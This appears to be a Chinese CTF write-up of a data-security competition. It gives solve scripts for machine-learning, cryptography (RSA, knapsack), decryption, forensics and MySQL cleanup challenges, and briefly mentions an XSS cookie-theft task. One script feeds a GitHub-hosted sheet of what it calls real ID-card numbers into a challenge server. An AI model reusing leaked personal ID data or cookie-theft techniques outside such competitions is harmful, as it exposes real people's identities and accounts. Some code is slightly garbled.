-联合战队|共同成长-
为深入学习贯彻党的二十大精神,发掘数据安全人才,促进数据安全技术发展与应用,提升我国数据安全治理能力,护航数字中国建设,中国电子信息产业发展研究院、中国信息通信研究院、国家工业信息安全发展研究中心、中国软件评测中心(工业和信息化部软件与集成电路促进中心)联合举办第二届数据安全大赛暨首届“数信杯”数据安全大赛。本赛事为数据安全产业高峰论坛的重要组成部分。
training
因为是AI,所以中途换到了打电脑上去做,虽然最后还是在kaggle上做的,录频文件没有这道题。一血也不存在什么抄袭吧。。。
# Import Data Science Libraries
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import tensorflow as tf
from sklearn.model_selection import train_test_split
from PIL import Image
# Tensorflow Libraries
from tensorflow import keras
from tensorflow.keras import layers,models
from keras_preprocessing.image import ImageDataGenerator
from keras.layers import Dense, Dropout
from tensorflow.keras.callbacks import Callback, EarlyStopping,ModelCheckpoint
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.applications import MobileNetV2
from tensorflow.keras import Model
from tensorflow.keras.layers.experimental import preprocessing
# System libraries
from pathlib import Path
import os.path
# Metrics
from sklearn.metrics import classification_report, confusion_matrix
import itertools
#!ls /
#!wget https://raw.githubusercontent.com/mrdbourke/tensorflow-deep-learning/main/extras/helper_functions.py
#!cp /kaggle/input/help-dataset/helper_functions.py ./helper_functions.py
# Import series of helper functions for our notebook
from helper_functions import create_tensorboard_callback, plot_loss_curves, unzip_data, compare_historys, walk_through_dir, pred_and_plot
BATCH_SIZE = 32
IMAGE_SIZE = (224, 224)
# Walk through each directory
dataset = "../input/train-data/"
walk_through_dir(dataset)
image_dir = Path(dataset)
# Get filepaths and labels
filepaths = list(image_dir.glob(r'**/*.JPG')) + list(image_dir.glob(r'**/*.jpg')) + list(image_dir.glob(r'**/*.png'))
labels = list(map(lambda x: os.path.split(os.path.split(x)[0])[1], filepaths))
filepaths = pd.Series(filepaths, name='Filepath').astype(str)
labels = pd.Series(labels, name='Label')
# Concatenate filepaths and labels
image_df = pd.concat([filepaths, labels], axis=1)
import matplotlib.image as mpimg
# Display 16 picture of the dataset with their labels
random_index = np.random.randint(0, len(image_df), 16)
fig, axes = plt.subplots(nrows=4, ncols=4, figsize=(10, 10),
subplot_kw={'xticks': [], 'yticks': []})
for i, ax in enumerate(axes.flat):
image = Image.open(image_df.Filepath[random_index[i]])
ax.imshow(image)
ax.set_title(image_df.Label[random_index[i]])
plt.tight_layout()
plt.show()
# Separate in train and test data
train_df, test_df = train_test_split(image_df, test_size=1e-7, shuffle=True, random_state=42)
train_generator = ImageDataGenerator(
preprocessing_function=tf.keras.applications.mobilenet_v2.preprocess_input,
validation_split=1e-7
)
test_generator = ImageDataGenerator(
preprocessing_function=tf.keras.applications.mobilenet_v2.preprocess_input
)
# Split the data into three categories.
train_images = train_generator.flow_from_dataframe(
dataframe=train_df,
x_col='Filepath',
y_col='Label',
target_size=(224, 224),
color_mode='rgb',
class_mode='categorical',
batch_size=32,
shuffle=True,
seed=42,
subset='training'
)
val_images = train_generator.flow_from_dataframe(
dataframe=train_df,
x_col='Filepath',
y_col='Label',
target_size=(224, 224),
color_mode='rgb',
class_mode='categorical',
batch_size=32,
shuffle=True,
seed=42,
subset='validation'
)
test_images = test_generator.flow_from_dataframe(
dataframe=test_df,
x_col='Filepath',
y_col='Label',
target_size=(224, 224),
color_mode='rgb',
class_mode='categorical',
batch_size=32,
shuffle=False
)
# Load the pretained model
pretrained_model = tf.keras.applications.MobileNetV2(
input_shape=(224, 224, 3),
include_top=False,
weights=None,
pooling='avg'
)
pretrained_model.load_weights('/kaggle/input/mobilenet-v2/mobilenet_v2_weights_tf_dim_ordering_tf_kernels_1.0_224_no_top.h5')
pretrained_model.trainable = False
# Create checkpoint callback
checkpoint_path = "fires_classification_model_checkpoint"
checkpoint_callback = ModelCheckpoint(checkpoint_path,
save_weights_only=True,
monitor="val_accuracy",
save_best_only=True)
# Setup EarlyStopping callback to stop training if model's val_loss doesn't improve for 3 epochs
early_stopping = EarlyStopping(monitor = "val_loss", # watch the val loss metric
patience = 5,
restore_best_weights = True) # if val loss decreases for 3 epochs in a row, stop training
inputs = pretrained_model.input
x = Dense(256, activation='relu')(pretrained_model.output)
x = Dropout(0.2)(x)
x = Dense(256, activation='relu')(x)
x = Dropout(0.2)(x)
outputs = Dense(2, activation='softmax')(x)
model = Model(inputs=inputs, outputs=outputs)
model.compile(
optimizer=Adam(0.0001),
loss='categorical_crossentropy',
metrics=['accuracy']
)
history = model.fit(
train_images,
steps_per_epoch=len(train_images),
validation_data=val_images,
validation_steps=len(val_images),
epochs=15
)
model.save('model_new.h5')
SU7
怀疑ct偷懒了,这个题似乎见过。当时我们还是一血
pwnhub2022冬季赛 飞驰人生
结合之前的经验考虑查看油门和车门
找到了数据都不对,最后发现偷偷改了最后一个油门数据。。。
很无语的题目,远没有第一次见面质量
messagebox
就是一道xss盗取cookie的题 payload:
弹到cookie就行
RWZIP
数据缺失
补充上去
仅字母反转
幻方
三阶幻方只有八种结果,认准一个多试几次就行
import hashlib
import random
while True:
rand_str = (''.join([random.choice(dir) for _ in range(4)])) + 'CyhQp8lsgzYjTNUD'
if hashlib.sha256(rand_str.encode()).hexdigest() == '11f8af166cc28e24b4646cc300436f4d4bf8e11b2327379331a3eca2d5fc7c0c':
print(rand_str[:4])
break
'''
[2, 7, 6, 9, 5, 1, 4, 3, 8]
[2, 9, 4, 7, 5, 3, 6, 1, 8]
[4, 3, 8, 9, 5, 1, 2, 7, 6]
[4, 9, 2, 3, 5, 7, 8, 1, 6]
[6, 1, 8, 7, 5, 3, 2, 9, 4]
[6, 7, 2, 1, 5, 9, 8, 3, 4]
[8, 1, 6, 3, 5, 7, 4, 9, 2]
[8, 3, 4, 1, 5, 9, 6, 7, 2]
4 3 8
9 5 1
2 7 6
'''
RWIO
pyc
在线反编译拿到源码,已有flag.enc文件,很简单的解密逻辑,拷打AI编写exp:
mport random
import os
def decrypt_data(encrypted_data):
random.seed(114514)
decrypted_data = bytearray()
for byte in encrypted_data:
key = random.randint(0, 128)
decrypted_data.append(byte ^ key)
return decrypted_data
def read_file(file_path, mode='rb'):
with open(file_path, mode) as file:
return file.read()
def write_file(file_path, data, mode='wb'):
with open(file_path, mode) as file:
file.write(data)
def decrypt_file(encrypted_file_path, output_file_path):
encrypted_data = read_file(encrypted_file_path)
decrypted_data = decrypt_data(encrypted_data)
write_file(output_file_path, decrypted_data)
if
name
== "
__main__
":
encrypted_file_path = './flag.enc'
output_file_path = './flag_decrypted.txt'
decrypt_file(encrypted_file_path, output_file_path)
USBhacker
MWatch
多次出现Heart Rate,结合题目描述应该就是找这个,只查看Heart Rate相关
BabyRSA
from Crypto.Util.number import *
r = 287040188443069778047400125757341514899
e = 96001
c = 7385580281056276781497978538020227181009675544528771975750499295104237912389096731847571930273208146186326124578668216163319969575131936068848815308298035625
m = ZZ(pow(c, inverse_mod(e, r
**4-r**
3), r**4))
print(long_to_bytes(m))
Backpack
from Crypto.Util.number import *
from math import log2
C = 231282844744
M = [27811518167, 19889199464, 19122558731, 19966624823, 25670001067, 30690729665, 23936341812, 31011714749, 30524482330, 21737374993, 17530717152, 19140841231, 33846825616, 17334386491, 28867755886, 29354544582, 21758322019, 27261411361, 31465376167, 26145493792, 27075307455, 33514052206, 25397635665, 21970496142, 30801229475, 22405695620, 18486900933, 27071880304, 17919853256, 18072328152, 21108080920]
L = block_matrix([
[1, matrix(ZZ, M).T],
[0, C]
]).LLL()
for row in L:
if row[-1] == 0 and len(set(row)) == 2:
ans = [abs(i) for i in row[:-1]]
ans = int(''.join(map(str, ans)), 2)
print(long_to_bytes(ans))
定向数据采集
github找的信息表
https://github.com/xuxin3101/-excel-/blob/master/%E6%95%B4%E7%90%86%E5%90%8E%E7%9A%84%E8%BA%AB%E4%BB%BD%E8%AF%81.xlsx
import openpyxl
import requests
import time
from urllib.parse import urlencode
burp0_url = "http://121.40.65.125:23328/submit"
def separate_name_and_id(input_file, output_file):
wb = openpyxl.load_workbook(input_file)
ws = wb.active
for row in ws.iter_rows(min_row=1, max_col=1, max_row=ws.max_row, values_only=True):
if row[0]:
name, id_number = row[0].split('----') #提取名字和身份证
print(name, id_number)
age = 2024-int(id_number[6:10])
if(int(id_number[10:12])>4):
age -= 1
sexx=u"男"
burp0_json={"address": "asd", "age": str(age), "ethnicity": "as", "experience": "1", "idcard": id_number, "name": "a", "phonenumber": "12312331233", "position": "as", "sex": sexx}
sexx2 = u"女"
burp0_json1={"address": "asd", "age": str(age), "ethnicity": "as", "experience": "1", "idcard": id_number, "name": "a", "phonenumber": "12312331233", "position": "as", "sex": sexx2}
try:
r0=requests.post(burp0_url, json=burp0_json)
r1=requests.post(burp0_url, json=burp0_json1)
print(r0.request.body)
print(r0.text,r1.text)
#time.sleep(0.5)
except requests.exceptions:
print("err")
#time.sleep(2)
#ws.append([name.strip(), id_number.strip()])
#wb.save(output_file)
wb.close()
if __name__ == "__main__":
input_file = "data1.xlsx"
output_file = "separated_data.xlsx" #没啥用,废弃掉了
separate_name_and_id(input_file, output_file)
代码写的很丑陋,能跑就行(笑死
weather
审下bundle.js
带参数去访问,猜下
mysql数据清理
先删
DELETE FROM ShoppingCart WHERE user_id in ("5142","2123","1169","8623");
DELETE FROM TransactionHistory WHERE user_id in ("5142","2123","1169","8623");
DELETE FROM UserLog WHERE user_id in ("5142","2123","1169","8623");
DELETE FROM Wallet WHERE user_id in ("5142","2123","1169","8623");
DELETE FROM User WHERE id in ("5142","2123","1169","8623");
再重建一下表,清掉删除之后的残留数据
alter table User engine = innodb;
alter table UserLog engine = innodb;
alter table TransactionHistory engine = innodb;
alter table ShoppingCart engine = innodb;
alter table Orders engine = innodb;
原文始发于微信公众号(N0wayBack):西区-第二届数据安全大赛暨首届“数信杯”数据安全大赛 WP
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论